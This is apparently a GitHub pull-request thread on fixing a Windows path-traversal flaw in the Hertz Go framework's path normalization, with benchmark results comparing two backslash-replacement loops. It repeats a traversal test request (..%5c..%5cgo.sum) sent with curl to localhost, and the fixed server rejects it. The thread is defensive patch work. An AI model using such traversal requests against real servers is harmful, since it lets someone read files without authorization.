func normalizePath(dst, src \[\]byte) \[\]byte {
	dst \= dst\[:0\]
	dst \= addLeadingSlash(dst, src)
	dst \= decodeArgAppendNoPlus(dst, src)

	// replace all backslashes with forward slashes
	if filepath.Separator \== '\\\\' {
		for i := range dst {
			if dst\[i\] \== '\\\\' {
				dst\[i\] \= '/'
			}
		}
	}
	...
}

before the if judgment  
src = "/..%5c..%5cgo.sum"  
dst = "//..\\..\\go.sum"

curl -v 127.0.0.1:8888/..%5c..%5cgo.sum
\*   Trying 127.0.0.1:8888...
\* Connected to 127.0.0.1 (127.0.0.1) port 8888 (#0)
\> GET /..%5c..%5cgo.sum HTTP/1.1
\> Host: 127.0.0.1:8888
\> User-Agent: curl/7.83.1
\> Accept: \*/\*
\>
\* Mark bundle as not supporting multiuse
< HTTP/1.1 404 404 Page not found
< Date: Mon, 05 Sep 2022 09:10:07 GMT
< Content-Type: text/plain; charset=utf-8
< Content-Length: 26
<
Cannot open requested path\* Connection #0 to host 127.0.0.1 left intact

> > The example/standard demo seems still have the problem in Windows if the url is : 127.0.0.1:8888/..%5c..%5cgo.sum
> 
> this version solve the problem
> 
> func normalizePath(dst, src \[\]byte) \[\]byte {
> 	dst \= dst\[:0\]
> 	dst \= addLeadingSlash(dst, src)
> 	dst \= decodeArgAppendNoPlus(dst, src)
> 
> 	// replace all backslashes with forward slashes
> 	if filepath.Separator \== '\\\\' {
> 		for i := range dst {
> 			if dst\[i\] \== '\\\\' {
> 				dst\[i\] \= '/'
> 			}
> 		}
> 	}
> 	...
> }
> 
> before the if judgment src = "/..%5c..%5cgo.sum" dst = "//....\\go.sum"
> 
> curl -v 127.0.0.1:8888/..%5c..%5cgo.sum
> \*   Trying 127.0.0.1:8888...
> \* Connected to 127.0.0.1 (127.0.0.1) port 8888 (#0)
> \> GET /..%5c..%5cgo.sum HTTP/1.1
> \> Host: 127.0.0.1:8888
> \> User-Agent: curl/7.83.1
> \> Accept: \*/\*
> \>
> \* Mark bundle as not supporting multiuse
> < HTTP/1.1 404 404 Page not found
> < Date: Mon, 05 Sep 2022 09:10:07 GMT
> < Content-Type: text/plain; charset=utf-8
> < Content-Length: 26
> <
> Cannot open requested path\* Connection #0 to host 127.0.0.1 left intact

Good job! As for the performance part, maybe do a bench test to see the answer.

Copy link

Contributor Author

****ruokeqx** commented Sep 5, 2022**

> > > The example/standard demo seems still have the problem in Windows if the url is : 127.0.0.1:8888/..%5c..%5cgo.sum
> > 
> > this version solve the problem
> > 
> > func normalizePath(dst, src \[\]byte) \[\]byte {
> > 	dst \= dst\[:0\]
> > 	dst \= addLeadingSlash(dst, src)
> > 	dst \= decodeArgAppendNoPlus(dst, src)
> > 
> > 	// replace all backslashes with forward slashes
> > 	if filepath.Separator \== '\\\\' {
> > 		for i := range dst {
> > 			if dst\[i\] \== '\\\\' {
> > 				dst\[i\] \= '/'
> > 			}
> > 		}
> > 	}
> > 	...
> > }
> > 
> > before the if judgment src = "/..%5c..%5cgo.sum" dst = "//....\\go.sum"
> > 
> > curl -v 127.0.0.1:8888/..%5c..%5cgo.sum
> > \*   Trying 127.0.0.1:8888...
> > \* Connected to 127.0.0.1 (127.0.0.1) port 8888 (#0)
> > \> GET /..%5c..%5cgo.sum HTTP/1.1
> > \> Host: 127.0.0.1:8888
> > \> User-Agent: curl/7.83.1
> > \> Accept: \*/\*
> > \>
> > \* Mark bundle as not supporting multiuse
> > < HTTP/1.1 404 404 Page not found
> > < Date: Mon, 05 Sep 2022 09:10:07 GMT
> > < Content-Type: text/plain; charset=utf-8
> > < Content-Length: 26
> > <
> > Cannot open requested path\* Connection #0 to host 127.0.0.1 left intact
> 
> Good job! As for the performance part, maybe do a bench test to see the answer.

I did some simple benchmarks, when there are backslashes in path, for-range option is faster, when there is no backslash in path, IndexByte option is faster.

Choose IndexByte maybe more reasonable since most normal URLs don't have backslashes in them.

var benchDstBackslashShort \= \[\]byte("/..\\\\foo")
var benchDstBackslashLong \= \[\]byte("/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\foo")
var benchDstNoBackslashShort \= \[\]byte("/../foo")
var benchDstNoBackslashLong \= \[\]byte("/../../../../../../../../../../foo")

func BenchmarkForrange(b \*testing.B) {
	for i := 0; i < b.N; i++ {
		for i := range benchDstNoBackslashShort {
			if benchDstNoBackslashShort\[i\] \== '\\\\' {
				benchDstNoBackslashShort\[i\] \= '/'
			}
		}
		benchDstNoBackslashShort \= \[\]byte("/../foo")
	}
}

func BenchmarkIndexByte(b \*testing.B) {
	for i := 0; i < b.N; i++ {
		for {
			n := bytes.IndexByte(benchDstNoBackslashShort, '\\\\')
			if n < 0 {
				break
			}
			benchDstNoBackslashShort\[n\] \= '/'
		}
		benchDstNoBackslashShort \= \[\]byte("/../foo")
	}
}

environment

goos: windows
goarch: amd64
pkg: github.com/cloudwego/hertz/pkg/protocol
cpu: Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz

benchDstBackslashShort

BenchmarkForrange-12     	57650732	        19.92 ns/op	       8 B/op	       1 allocs/op
BenchmarkIndexByte-12    	43823608	        27.97 ns/op	       8 B/op	       1 allocs/op
PASS
ok  	github.com/cloudwego/hertz/pkg/protocol	2.521s

benchDstBackslashLong

BenchmarkForrange-12     	21818498	        52.70 ns/op	      48 B/op	       1 allocs/op
BenchmarkIndexByte-12    	 9185786	       130.1 ns/op	      48 B/op	       1 allocs/op
PASS
ok  	github.com/cloudwego/hertz/pkg/protocol	2.941s

benchDstNoBackslashShort

BenchmarkForrange-12     	53754288	        19.66 ns/op	       8 B/op	       1 allocs/op
BenchmarkIndexByte-12    	61503766	        19.34 ns/op	       8 B/op	       1 allocs/op
PASS
ok  	github.com/cloudwego/hertz/pkg/protocol	2.379s

benchDstNoBackslashLong

BenchmarkForrange-12     	21096711	        49.30 ns/op	      48 B/op	       1 allocs/op
BenchmarkIndexByte-12    	32403181	        37.07 ns/op	      48 B/op	       1 allocs/op
PASS
ok  	github.com/cloudwego/hertz/pkg/protocol	2.724s

PTAL. There may have a side effect which lead to a failure of existing UT

Copy link

Contributor Author

****ruokeqx** commented Sep 6, 2022 •**

My fault. Since we add if filepath.Separator == '\\' {, backslashes were replaced when running UT in my windows laptop. However, linux would not replace them.  
We can pass the the UT by modifying the code like below.

if filepath.Separator \== '\\\\' && string(parsedPath) != expectedPath {
    t.Fatalf("Unexpected Path: %q. Expected %q", parsedPath, expectedPath)
}

Also, github action can not check windows path.

Tag

#windows